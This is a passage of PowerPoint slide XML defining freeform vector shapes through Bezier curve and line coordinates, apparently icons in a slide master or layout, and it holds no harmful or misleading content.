                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="51"/>
                      <a:pt x="69" y="52"/>
                      <a:pt x="66" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="54"/>
                      <a:pt x="65" y="55"/>
                      <a:pt x="64" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="58"/>
                      <a:pt x="64" y="59"/>
                      <a:pt x="65" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="60"/>
                      <a:pt x="67" y="61"/>
                      <a:pt x="68" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="66"/>
                      <a:pt x="74" y="66"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="87" y="65"/>
                      <a:pt x="91" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="62"/>
                      <a:pt x="98" y="61"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="58"/>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="60"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="63"/>
                      <a:pt x="91" y="65"/>
                      <a:pt x="86" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="69"/>
                      <a:pt x="79" y="69"/>
                      <a:pt x="74" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="69"/>
                      <a:pt x="72" y="68"/>
                      <a:pt x="71" y="68"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="41"/>
                      <a:pt x="72" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="70" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="40"/>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="41"/>
                      <a:pt x="72" y="42"/>
                      <a:pt x="72" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="44"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="99" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="42"/>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Freeform 193"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3551" y="2614"/>
                <a:ext cx="3" cy="2"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 2"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 1 w 2"/>
                  <a:gd name="T3" fmla="*/ 1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1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="2"/>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1"/>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Freeform 194"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3564" y="261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Freeform 195"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2004"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Freeform 196"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2152"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Freeform 197"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="23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Freeform 198"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2497"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Freeform 199"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2692"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Freeform 200"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2890"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Freeform 201"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3032" y="3298"/>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Freeform 202"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3140" y="3298"/>
                <a:ext cx="77"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3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9"/>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4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="44"/>
                      <a:pt x="22" y="44"/>
                      <a:pt x="22" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="27"/>
                      <a:pt x="15" y="18"/>
                      <a:pt x="0" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="0"/>
                      <a:pt x="42" y="14"/>
                      <a:pt x="42" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="83"/>
                      <a:pt x="42" y="83"/>
                      <a:pt x="42" y="83"/>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Freeform 203"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3248"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Freeform 204"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3395"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Freeform 205"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3590"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Freeform 206"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3788"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Freeform 207"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3938"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Freeform 208"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4085"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Freeform 209"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4284"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Freeform 210"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4433" y="3292"/>
                <a:ext cx="82"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Freeform 211"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4581"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Freeform 212"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4779"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Freeform 213"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4926"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Freeform 214"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5125"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Freeform 215"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5261" y="3298"/>
                <a:ext cx="188" cy="218"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 188 w 188"/>
                  <a:gd name="T1" fmla="*/ 67 h 218"/>
                  <a:gd name="T2" fmla="*/ 184 w 188"/>
                  <a:gd name="T3" fmla="*/ 84 h 218"/>
                  <a:gd name="T4" fmla="*/ 142 w 188"/>
                  <a:gd name="T5" fmla="*/ 84 h 218"/>
                  <a:gd name="T6" fmla="*/ 131 w 188"/>
                  <a:gd name="T7" fmla="*/ 134 h 218"/>
                  <a:gd name="T8" fmla="*/ 177 w 188"/>
                  <a:gd name="T9" fmla="*/ 134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4 h 218"/>
                  <a:gd name="T32" fmla="*/ 48 w 188"/>
                  <a:gd name="T33" fmla="*/ 134 h 218"/>
                  <a:gd name="T34" fmla="*/ 58 w 188"/>
                  <a:gd name="T35" fmla="*/ 84 h 218"/>
                  <a:gd name="T36" fmla="*/ 11 w 188"/>
                  <a:gd name="T37" fmla="*/ 84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4 h 218"/>
                  <a:gd name="T60" fmla="*/ 78 w 188"/>
                  <a:gd name="T61" fmla="*/ 84 h 218"/>
                  <a:gd name="T62" fmla="*/ 67 w 188"/>
                  <a:gd name="T63" fmla="*/ 134 h 218"/>
                  <a:gd name="T64" fmla="*/ 110 w 188"/>
                  <a:gd name="T65" fmla="*/ 134 h 218"/>
                  <a:gd name="T66" fmla="*/ 121 w 188"/>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4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188"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Freeform 216"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5478"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0" name="Freeform 217"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5904" y="3292"/>
                <a:ext cx="82"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419"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1951" y="0"/>
              <a:ext cx="5890" cy="3541"/>
              <a:chOff x="1951" y="0"/>
              <a:chExt cx="5890" cy="3541"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1349" name="Freeform 219"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6051"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220"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="62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221"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="639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222"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6547"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223"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6744"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Freeform 224"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6893"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225"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7043"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Freeform 226"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7192"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227"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7340"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3"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228"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="753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229"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7686"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230"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5672" y="3284"/>
                <a:ext cx="218" cy="256"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 179"/>
                  <a:gd name="T1" fmla="*/ 174 h 209"/>
                  <a:gd name="T2" fmla="*/ 134 w 179"/>
                  <a:gd name="T3" fmla="*/ 209 h 209"/>
                  <a:gd name="T4" fmla="*/ 81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2 w 179"/>
                  <a:gd name="T23" fmla="*/ 84 h 209"/>
                  <a:gd name="T24" fmla="*/ 58 w 179"/>
                  <a:gd name="T25" fmla="*/ 28 h 209"/>
                  <a:gd name="T26" fmla="*/ 117 w 179"/>
                  <a:gd name="T27" fmla="*/ 18 h 209"/>
                  <a:gd name="T28" fmla="*/ 159 w 179"/>
                  <a:gd name="T29" fmla="*/ 129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7 w 179"/>
                  <a:gd name="T85" fmla="*/ 42 h 209"/>
                  <a:gd name="T86" fmla="*/ 78 w 179"/>
                  <a:gd name="T87" fmla="*/ 44 h 209"/>
                  <a:gd name="T88" fmla="*/ 66 w 179"/>
                  <a:gd name="T89" fmla="*/ 35 h 209"/>
                  <a:gd name="T90" fmla="*/ 67 w 179"/>
                  <a:gd name="T91" fmla="*/ 48 h 209"/>
                  <a:gd name="T92" fmla="*/ 73 w 179"/>
                  <a:gd name="T93" fmla="*/ 48 h 209"/>
                  <a:gd name="T94" fmla="*/ 65 w 179"/>
                  <a:gd name="T95" fmla="*/ 60 h 209"/>
                  <a:gd name="T96" fmla="*/ 101 w 179"/>
                  <a:gd name="T97" fmla="*/ 59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9"/>
                      <a:pt x="134" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="209"/>
                      <a:pt x="128" y="209"/>
                      <a:pt x="125" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="208"/>
                      <a:pt x="119" y="206"/>
                      <a:pt x="118" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="200"/>
                      <a:pt x="113" y="198"/>
                      <a:pt x="110" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="198"/>
                      <a:pt x="90" y="199"/>
                      <a:pt x="81" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="199"/>
                      <a:pt x="72" y="200"/>
                      <a:pt x="68" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="209"/>
                      <a:pt x="54" y="209"/>
                      <a:pt x="48" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>
                      <a:pt x="38" y="204"/>
                      <a:pt x="32" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="198"/>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10" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="159"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="163"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="9" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="163"/>
                      <a:pt x="9" y="163"/>
                      <a:pt x="9" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="170"/>
                      <a:pt x="6" y="171"/>
                      <a:pt x="6" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="187"/>
                      <a:pt x="4" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="192"/>
                      <a:pt x="7" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="194"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="13" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="197"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="45" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="204"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="55" y="204"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="198"/>
                      <a:pt x="65" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="186"/>
                      <a:pt x="62" y="182"/>
                      <a:pt x="60" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="170"/>
                      <a:pt x="49" y="161"/>
                      <a:pt x="42" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="150"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="29" y="143"/>
                      <a:pt x="27" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="141"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="133"/>
                      <a:pt x="26" y="132"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="32" y="119"/>
                      <a:pt x="35" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="39" y="100"/>
                      <a:pt x="43" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="91"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="52" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="77"/>
                      <a:pt x="58" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="71"/>
                      <a:pt x="60" y="68"/>
                      <a:pt x="60" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="58"/>
                      <a:pt x="59" y="51"/>
                      <a:pt x="59" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="39"/>
                      <a:pt x="58" y="33"/>
                      <a:pt x="58" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="17"/>
                      <a:pt x="63" y="8"/>
                      <a:pt x="73" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="1"/>
                      <a:pt x="81" y="1"/>
                      <a:pt x="85" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="97" y="1"/>
                      <a:pt x="102" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="6"/>
                      <a:pt x="114" y="12"/>
                      <a:pt x="117" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="24"/>
                      <a:pt x="122" y="30"/>
                      <a:pt x="122" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="40"/>
                      <a:pt x="122" y="44"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="62"/>
                      <a:pt x="128" y="75"/>
                      <a:pt x="138" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="159" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="161" y="134"/>
                      <a:pt x="161" y="139"/>
                      <a:pt x="160" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160"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50"/>
                      <a:pt x="126" y="148"/>
                      <a:pt x="125" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="148"/>
                      <a:pt x="122" y="150"/>
                      <a:pt x="121" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="156"/>
                      <a:pt x="120" y="160"/>
                      <a:pt x="121" y="164"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="171"/>
                      <a:pt x="123" y="179"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="189"/>
                      <a:pt x="121" y="192"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="202"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="202"/>
                      <a:pt x="142" y="200"/>
                      <a:pt x="144" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="192"/>
                      <a:pt x="158" y="189"/>
                      <a:pt x="165" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="186"/>
                      <a:pt x="170" y="184"/>
                      <a:pt x="173" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="183"/>
                      <a:pt x="174" y="182"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="180"/>
                      <a:pt x="176" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="176"/>
                      <a:pt x="172" y="175"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="174"/>
                      <a:pt x="169" y="173"/>
                      <a:pt x="168" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="172"/>
                      <a:pt x="161" y="168"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="161"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="155"/>
                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
